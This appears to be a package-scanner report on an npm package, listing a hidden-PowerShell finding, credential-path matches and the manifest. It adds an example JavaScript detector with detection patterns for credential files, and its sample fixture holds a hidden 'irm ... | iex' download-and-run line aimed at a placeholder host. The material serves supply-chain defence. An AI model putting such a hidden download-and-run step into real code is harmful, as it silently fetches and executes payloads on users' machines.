Package evidence
@factiii/[email protected]
Js Hidden Powershell: Hidden / non-interactive PowerShell invocation in package code — `-WindowStyle Hidden`, `irm | iex`, `windowsHide: true`, or equivalent — used to download-and-run payloads on Windows installers.
Trust signals
Why this verdict
PkgRadar discounts a release’s score when public reputation argues against novel malware. The verdict above already reflects these signals; this panel only lists which ones were applied.
- Versions published: 191
- First published: Feb 2026
- Publisher: jsnyder10
Recommended action
Review before promoting. Mixed signals: the package has indicators worth reading before allowing the update in automated dependency flows.
Block this release in CI (curl · GitHub Actions)
Fail the build when this package version is added or upgraded. Replace $PKGRADAR_TOKEN with a Pro / Team API key from your dashboard. With `-f`, curl exits non-zero on an HTTP error response, which is what fails the step.
```shell
curl -fsS https://pkgradar.com/gate/npm \
  -H "Authorization: Bearer $PKGRADAR_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"specs":["@factiii/[email protected]"],"fail_on":"review"}'
```
GitHub Actions step:
```yaml
- name: PkgRadar gate
  run: |
    curl -fsS https://pkgradar.com/gate/npm \
      -H "Authorization: Bearer ${{ secrets.PKGRADAR_TOKEN }}" \
      -H "Content-Type: application/json" \
      -d '{"specs":["@factiii/[email protected]"],"fail_on":"review"}'
```
Why flagged
What the scanner saw
Js Hidden Powershell: Hidden / non-interactive PowerShell invocation in package code — `-WindowStyle Hidden`, `irm | iex`, `windowsHide: true`, or equivalent — used to download-and-run payloads on Windows installers.
Not observed: package install, lifecycle script execution, or sandbox execution. PkgRadar only inspects on-disk artifacts, so the detail text above is the rule's generic description of what such invocations are used for, not a confirmation that this package downloads anything. Read the flagged file (package/dist/plugins/servers/windows/index.js) to see what the PowerShell call actually runs and where its command string comes from.
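To make the two rule kinds on this page concrete, here is an added example detector. It is my own heuristic, not PkgRadar's scanner (whose actual matching logic and point values are not published on this page), run over three constructed source files: one that spawns PowerShell hidden with an `irm | iex` command, one deploy helper that builds a path under `~/.ssh/`, and one that sets `windowsHide: true` on a plain `git` spawn. The last is the caveat a reviewer should carry: `windowsHide` on its own is routine in cross-platform CLIs, so this heuristic requires a PowerShell invocation in the same file before it raises the high finding. File paths, token lists, severities and points are assumptions modelled on the findings table.

```javascript
// Added example, not PkgRadar's scanner: a minimal static detector for the two
// finding kinds on this page. Rule logic and point values are assumptions.

// Tokens that hide the window or suppress interaction (the page's "-WindowStyle Hidden",
// "windowsHide: true", "irm | iex" or equivalent). The WindowStyle pattern also matches
// the flag split across argv entries, e.g. ["-WindowStyle", "Hidden"].
const HIDE_TOKENS = [
  /-WindowStyle["',\s]+Hidden/i,
  /windowsHide\s*:\s*true/,
  /\birm\b[^\n]*\|\s*iex\b/i,
  /-NonInteractive\b/i,
];
const POWERSHELL_TOKENS = [/\bpowershell(\.exe)?\b/i, /\bpwsh(\.exe)?\b/i];
const DOWNLOAD_EXEC_TOKENS = [
  /\birm\b[^\n]*\|\s*iex\b/i,
  /Invoke-WebRequest/i,
  /Invoke-Expression/i,
  /DownloadString\s*\(/i,
];
// Substrings the page's "Credential file access" rows matched on.
const CREDENTIAL_TOKENS = [".ssh/", ".aws/", "AWS_ACCESS_KEY", "AWS_SECRET_ACCESS_KEY"];

function firstMatch(source, patterns) {
  for (const p of patterns) {
    const m = source.match(p);
    if (m) return m[0];
  }
  return null;
}

// Js Hidden Powershell: fires only when a PowerShell invocation AND a hide/non-interactive
// token are both present in the same file. `windowsHide: true` alone is not enough here
// because cross-platform CLIs set it on ordinary spawns (git, npm, ssh) to avoid a console flash.
function hiddenPowershell(path, source) {
  const shell = firstMatch(source, POWERSHELL_TOKENS);
  const hide = firstMatch(source, HIDE_TOKENS);
  if (!shell || !hide) return null;
  const dl = firstMatch(source, DOWNLOAD_EXEC_TOKENS);
  return {
    severity: "high",
    kind: "Js Hidden Powershell",
    path,
    points: 45,
    detail: `${shell} invoked with ${hide}` +
      (dl ? `; download-and-run via ${dl}` : "; no download-and-run token seen, read the file to confirm what it runs"),
  };
}

// Credential file access: plain substring match, low severity, as in the table.
function credentialFileAccess(path, source) {
  const tok = CREDENTIAL_TOKENS.find((t) => source.includes(t));
  return tok
    ? { severity: "low", kind: "Credential file access", path, points: 5, detail: `matched "${tok}"` }
    : null;
}

// Run every rule over every file; order high-signal first, then by path.
function scanPackage(files) {
  const findings = [];
  for (const [path, source] of Object.entries(files)) {
    for (const rule of [hiddenPowershell, credentialFileAccess]) {
      const f = rule(path, source);
      if (f) findings.push(f);
    }
  }
  const rank = { high: 0, medium: 1, low: 2 };
  return findings.sort((a, b) => rank[a.severity] - rank[b.severity] || a.path.localeCompare(b.path));
}

function totalPoints(findings) {
  return findings.reduce((sum, f) => sum + f.points, 0);
}

// Constructed sample sources (not the package's real files). example.invalid is a reserved name.
const SAMPLE_FILES = {
  "package/dist/plugins/servers/windows/index.js": `
    const { spawn } = require("child_process");
    const ps = spawn("powershell.exe",
      ["-NoProfile", "-WindowStyle", "Hidden", "-Command", "irm https://example.invalid/setup.ps1 | iex"],
      { windowsHide: true });`,
  "package/dist/utils/ssh-helper.js": `
    const os = require("os"), path = require("path");
    const keyPath = path.join(os.homedir(), ".ssh/", "id_ed25519");`,
  "package/dist/cli/git.js": `
    const { spawn } = require("child_process");
    spawn("git", ["status"], { windowsHide: true }); // only keeps the console from flashing on Windows`,
};

// Usage: node scan.js  (prints the findings table as JSON)
if (typeof require !== "undefined" && require.main === module) {
  const found = scanPackage(SAMPLE_FILES);
  console.log(JSON.stringify({ findings: found, score: totalPoints(found) }, null, 2));
}
```

The output mirrors the page's table: the Windows plugin file gets the single high finding, the SSH helper gets a 5-point low finding, and the `git` spawn gets nothing. When you review a real hit, the question the detector cannot answer is whether the command string is fixed or fetched from somewhere at runtime; that is what reading the flagged file settles.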
Availability ledger
available
Status history (1 event)
- new → available · risk review · score 135 · status changed
Evidence
Static findings
24 static · 0 from release diff · showing high-signal first.
| Severity | Kind | Path | Detail | Points |
|---|---|---|---|---|
| high | Js Hidden Powershell | package/dist/plugins/servers/windows/index.js | Hidden / non-interactive PowerShell invocation in package code — `-WindowStyle Hidden`, `irm | iex`, `windowsHide: true`, or equivalent — used to download-and-run payloads on Windows installers. | 45 |
| low | Credential file access | package/dist/plugins/pipelines/aws/utils/aws-helpers.js | matched "AWS_ACCESS_KEY" | 5 |
| low | Credential file access | package/dist/plugins/pipelines/aws/scanfix/credentials.js | matched "AWS_SECRET_ACCESS_KEY" | 5 |
| low | Credential file access | package/dist/cli/deploy.js | matched ".ssh/" | 5 |
| low | Credential file access | package/dist/cli/dev-reset.js | matched ".ssh/" | 5 |
| low | Credential file access | package/dist/plugins/pipelines/aws/scanfix/ec2.js | matched ".ssh/" | 5 |
| low | Credential file access | package/dist/plugins/pipelines/factiii/scanfix/env-files.js | matched "AWS_ACCESS_KEY" | 5 |
| low | Credential file access | package/dist/cli/execute-plugin-command.js | matched ".ssh/" | 5 |
| low | Credential file access | package/dist/plugins/pipelines/aws/scanfix/iam.js | matched ".aws/" | 5 |
| low | Credential file access | package/dist/plugins/pipelines/aws/index.js | matched ".ssh/" | 5 |
| low | Credential file access | package/dist/plugins/servers/mac/index.js | matched ".ssh/" | 5 |
| low | Credential file access | package/dist/plugins/servers/ubuntu/index.js | matched ".ssh/" | 5 |
| low | Credential file access | package/dist/plugins/pipelines/aws/prod.js | matched "AWS_ACCESS_KEY" | 5 |
| low | Credential file access | package/dist/plugins/pipelines/factiii/prod.js | matched ".aws/" | 5 |
| low | Credential file access | package/dist/cli/scan.js | matched ".ssh/" | 5 |
| low | Credential file access | package/dist/utils/secret-prompts.js | matched ".ssh/" | 5 |
| low | Credential file access | package/dist/cli/secrets.js | matched "AWS_SECRET_ACCESS_KEY" | 5 |
| low | Credential file access | package/dist/plugins/pipelines/factiii/scanfix/secrets.js | matched ".ssh/" | 5 |
| low | Credential file access | package/dist/plugins/pipelines/factiii/scanfix/server-github-access.js | matched ".ssh/" | 5 |
| low | Credential file access | package/dist/plugins/pipelines/aws/scanfix/ssh-bridge.js | matched ".ssh/" | 5 |
| low | Credential file access | package/dist/utils/ssh-helper.js | matched ".ssh/" | 5 |
| low | Credential file access | package/dist/plugins/pipelines/factiii/scanfix/migrations/ssh-keys-location.js | matched ".ssh/" | 5 |
| low | Credential file access | package/dist/plugins/pipelines/factiii/scanfix/ssh-verify.js | matched ".ssh/" | 5 |
| low | Credential file access | package/dist/utils/template-generator.js | matched "AWS_ACCESS_KEY" | 5 |
Manifest
Package metadata
Scripts (10)
- build: `tsc && npm run copy-assets`
- build:watch: `tsc --watch`
- clean: `node -e "const fs=require('fs');if(fs.existsSync('dist'))fs.rmSync('dist',{recursive:true,force:true})"`
- copy-assets: `node -e "const fs=require('fs'),p=require('path');fs.cpSync('src/plugins/approved.json','dist/plugins/approved.json');const d='dist/plugins/pipelines/factiii/workflows';fs.mkdirSync(d,{recursive:true});for(const f of fs.readdirSync('src/plugins/pipelines/factiii/workflows').filter(f=>f.endsWith('.yml')))fs.cpSync(p.join('src/plugins/pipelines/factiii/workflows',f),p.join(d,f));const pd='dist/plugins/pipelines/aws/policies';fs.mkdirSync(pd,{recursive:true});for(const f of fs.readdirSync('src/plugins/pipelines/aws/policies').filter(f=>f.endsWith('.json')))fs.cpSync(p.join('src/plugins/pipelines/aws/policies',f),p.join(pd,f))"`
- prebuild: `npm run clean`
- prepublish-check: `node -e "const v=require('./package.json').version; if(v.includes('-d')){console.error('Cannot publish dev version:',v); process.exit(1)}; const ua=process.env.npm_config_user_agent||''; if(!ua.includes('pnpm')){const d=require('./package.json').dependencies||{}; for(const[k,v2]of Object.entries(d)){if(String(v2).startsWith('workspace:')){console.error('ERROR: workspace protocol found for '+k+'. Use pnpm publish (not npm publish) so workspace: references are resolved.');process.exit(1)}}}"`
- test: `jest`
- test:coverage: `jest --coverage`
- test:watch: `jest --watch`
- typecheck: `tsc --noEmit`

None of these is an install-time lifecycle hook (preinstall, install, postinstall, prepare), so this manifest runs no code at `npm install`; the flagged file executes only when the package's own code is invoked.
Dependencies (15)
- @aws-sdk/client-ec2 ^3.750.0
- @aws-sdk/client-ec2-instance-connect ^3.1001.0
- @aws-sdk/client-ecr ^3.750.0
- @aws-sdk/client-iam ^3.750.0
- @aws-sdk/client-rds ^3.750.0
- @aws-sdk/client-route-53 ^3.1001.0
- @aws-sdk/client-s3 ^3.750.0
- @aws-sdk/client-ses ^3.750.0
- @aws-sdk/client-sts ^3.750.0
- @factiii/auth ^0.12.0
- @octokit/rest ^20.0.2
- ansible-vault ^1.3.0
- commander ^11.1.0
- js-yaml ^4.1.1
- libsodium-wrappers ^0.7.11